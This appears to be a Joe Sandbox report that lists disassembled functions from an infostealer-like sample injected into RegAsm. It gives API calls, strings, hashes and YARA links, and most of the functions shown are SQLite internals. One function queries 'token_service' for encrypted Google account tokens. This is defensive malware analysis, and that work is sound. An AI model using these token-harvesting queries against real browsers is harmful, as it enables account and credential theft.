Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: c11be6b2916b80653d07e494be421a128f397711604d0f3b5431b5efc5032fd3
Instruction ID: 3df7d6a04258e40eba7ad953e7cd9cc3945b58cc80e351874b7ad67477887430
Opcode Fuzzy Hash: c11be6b2916b80653d07e494be421a128f397711604d0f3b5431b5efc5032fd3
Instruction Fuzzy Hash: D971D076904241DBE700DF28CC80B5BB7E8BF54704F48856EF84A9B281D335E95DCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA42 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040AA47
lstrlen.KERNEL32(?,00000001,75AA5460,00000000), ref: 0040AA65
strchr.MSVCRT ref: 0040AA7B
strchr.MSVCRT ref: 0040AA9F
lstrlen.KERNEL32(?), ref: 0040AABE
GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040AACF
HeapAlloc.KERNEL32(00000000), ref: 0040AAD6
lstrlen.KERNEL32(?), ref: 0040AAE6
strcpy_s.MSVCRT ref: 0040AB0E

Strings

0123456789ABCDEF, xrefs: 0040AA55

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Heapstrchr$AllocH_prologProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 165438908-2554083253
Opcode ID: c4452e68cb73842a2b96f3622f63f702c231f11502b0347549de088e44fb2826
Instruction ID: cd674aa860a93ed15ee028e0d2560fb68057847295549111a6c1a849f8df2c2f
Opcode Fuzzy Hash: c4452e68cb73842a2b96f3622f63f702c231f11502b0347549de088e44fb2826
Instruction Fuzzy Hash: 2121B472A006016FDB14DFB59C49AAF7B6DEF09314F00446AF815EB181DB38D501CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1983B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1239381436acf356be1c9dcf954ee300d2c7ebf49c07dcac823f9cb942518b6b
Instruction ID: 4246c2b9fea67f093656eb2d9fe6c58b826853569fefb32b8f42e25ee2fe539b
Opcode Fuzzy Hash: 1239381436acf356be1c9dcf954ee300d2c7ebf49c07dcac823f9cb942518b6b
Instruction Fuzzy Hash: 5D8136F58043869BD7108F24C84173ABBA0AF51202FDC497DE8D517296DB39DB86C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 1987F600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: 32a8da9c135ca0c0c6ca6a08ab18997aa618e8b6309cf26dbd01be9fdf367d73
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: 13511F76A04342ABD704CF19DC80B6BB3E8EF94710F88052DF94597280E725EA99C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 198A1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198A1B17
misuse, xrefs: 198A1B21
%s at line %d of [%.10s], xrefs: 198A1B26
block, xrefs: 198A1A90

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: 4faec3ecf7778b7124165d7de65ccc4f927443448e98213609685aa0ff057e4d
Instruction ID: 3d78ae92f02c421cabe827682c52743029ce51480a4d2ba25acb980c81784cbb
Opcode Fuzzy Hash: 4faec3ecf7778b7124165d7de65ccc4f927443448e98213609685aa0ff057e4d
Instruction Fuzzy Hash: 55C1E1B09002559FDB10CF28CC84A5A77A8FF54794F0D856DFC49DB281E735E919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00407E48 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407E4D

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

lstrlen.KERNEL32(00000000), ref: 0040806F

Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808

StrStrA.SHLWAPI(00000000,AccountId), ref: 00408094
lstrlen.KERNEL32(00000000), ref: 0040817E
lstrlen.KERNEL32(00000000), ref: 00408192

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED

Strings

GoogleAccounts, xrefs: 00407F01
AccountId, xrefs: 0040808E
SELECT service, encrypted_token FROM token_service, xrefs: 00407FEB
GoogleAccounts, xrefs: 00407E7E

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 832884763-1713091031
Opcode ID: ea076e332ee5bb9a2f5566caae1e44b5f75067fb30bab00997518d903317fe95
Instruction ID: 24b3c3a282480229a1685b2020985ca130bdc32fd69098786756b1b83c0bb1d1
Opcode Fuzzy Hash: ea076e332ee5bb9a2f5566caae1e44b5f75067fb30bab00997518d903317fe95
Instruction Fuzzy Hash: 19C16331804248EADB05EBE6D955ADDBBB4AF18308F14446EF401732C2DF786B18DB26

Uniqueness

Uniqueness Score: -1.00%

Function 1984FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

%llu, xrefs: 1984FFF7
no more rows available, xrefs: 1985006F
%llu, xrefs: 1984FF3C
unknown error, xrefs: 1985003E
abort due to ROLLBACK, xrefs: 19850068
another row available, xrefs: 19850076, 19850081

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: d89e9246da659309016d0bf271cb189613f8c54beabab753dca202eb61eaa1bc
Instruction ID: 13444003b0c07232db3d8d21f75c9eb8f82cb3d827493f9c42abf3357a185430
Opcode Fuzzy Hash: d89e9246da659309016d0bf271cb189613f8c54beabab753dca202eb61eaa1bc
Instruction Fuzzy Hash: C9910171A043009BD704DF28C884BAAB7E5BF85354F58452DF98EDB391D736E84ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 199570B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1995720D
orphan index, xrefs: 199572C2
API called with finalized prepared statement, xrefs: 19957201
invalid rootpage, xrefs: 1995715C, 1995730E
misuse, xrefs: 19957217
%s at line %d of [%.10s], xrefs: 1995721C

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: caa25086791136ab4d008bab0e7dd377ba7a07b16e9ed96809b91b19e6cbde15
Instruction ID: d9adf0d2fc4d2c06555cb6e0832d54aca6ebaf1ca717733047d94d8eb14e4b01
Opcode Fuzzy Hash: caa25086791136ab4d008bab0e7dd377ba7a07b16e9ed96809b91b19e6cbde15
Instruction Fuzzy Hash: DE613A759013416BF712CA25AC80B5F779DAF81215F1C846FEC968A182E731F358C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 19843A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

no such schema, xrefs: 19843BEA
bad page value, xrefs: 19843BDC
cannot insert, xrefs: 19843BF1, 19843C52
bad page number, xrefs: 19843BE3
cannot delete, xrefs: 19843A82
read-only, xrefs: 19843A71

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 5320cca79637ea79bbcc85cb5d93d437ec448edfd32cd55e61758b6d4671bc1b
Instruction ID: 18da0d2ea15d7719f02bff603b2841437e9e57f85cbb29f10be073f754069bbe
Opcode Fuzzy Hash: 5320cca79637ea79bbcc85cb5d93d437ec448edfd32cd55e61758b6d4671bc1b
Instruction Fuzzy Hash: C7511371A043489FD700CF28CA86B1A77E8AF60654F3D446EFC49CB291E73AE849C752

Uniqueness

Uniqueness Score: -1.00%

Function 1995B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 1995B0F9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1995B108
invalid, xrefs: 1995B13E
unopened, xrefs: 1995B145
misuse, xrefs: 1995B112
NULL, xrefs: 1995B0F4
%s at line %d of [%.10s], xrefs: 1995B117

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: 1a5c25728555f5aa5846f6236cf16f092ab4a978f4df011e87a1230e9749b6a4
Instruction ID: 7041eef4752e2a6ccd4649330c991bd68a8f27eb499dbe0250b5ca6f22a5122c
Opcode Fuzzy Hash: 1a5c25728555f5aa5846f6236cf16f092ab4a978f4df011e87a1230e9749b6a4
Instruction Fuzzy Hash: B631AD75404344AFF712CA689C00A9B77ADAF81329F4C052EE8D3E6141E771E6858B93

Uniqueness

Uniqueness Score: -1.00%

Function 1987F4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: 5b5716f24b432fffec80499e297cd9f017a1878265d7f2c93b09a353b8d720c6
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: AD2194AA90039277E70A9E25DC01F7F639CAF91615F4D845CFE15A2180F724E689C2A3

Uniqueness

Uniqueness Score: -1.00%

Function 1993FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1993FB96
API called with finalized prepared statement, xrefs: 1993FB7A
misuse, xrefs: 1993FBA0
API called with NULL prepared statement, xrefs: 1993FB65
%s at line %d of [%.10s], xrefs: 1993FBA5

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 3613309a5981d4558168cdac070a73f9295928734c3cc053871fbfc96882b3b4
Instruction ID: 17fae04e483ae0cc4e48dad93cfbea465685a572974fba2d79f8f97c2f49df52
Opcode Fuzzy Hash: 3613309a5981d4558168cdac070a73f9295928734c3cc053871fbfc96882b3b4
Instruction Fuzzy Hash: ADB1F5B49047418FE7218F38D845B1777E8BF4531AF8C452CE8DA87282E776E609C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 198B1710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

%z, %Q HIDDEN, %s HIDDEN), xrefs: 198B1831
%z%s%Q, xrefs: 198B180D
CREATE TABLE x(, xrefs: 198B17D9
rank, xrefs: 198B1824

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: 76735e1730086dbdec45c79ac1cd6ede01cd1baefae5ad89118343fbdaaeb9e6
Instruction ID: 975a59cc4565bede58e5a1a4cf2a4958d2323ba5e4ccd76519fd7e9bcb0c917d
Opcode Fuzzy Hash: 76735e1730086dbdec45c79ac1cd6ede01cd1baefae5ad89118343fbdaaeb9e6
Instruction Fuzzy Hash: 5181E071A00291AFDB018F68DC44A4AB7E8FF44255F4D062DFC4AEF260D736E959CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1984EB00 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1984ECCB
YHI;, xrefs: 1984EB06
%s at line %d of [%.10s], xrefs: 1984ECDA
%.*s%s, xrefs: 1984EC88
database corruption, xrefs: 1984ECD5

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
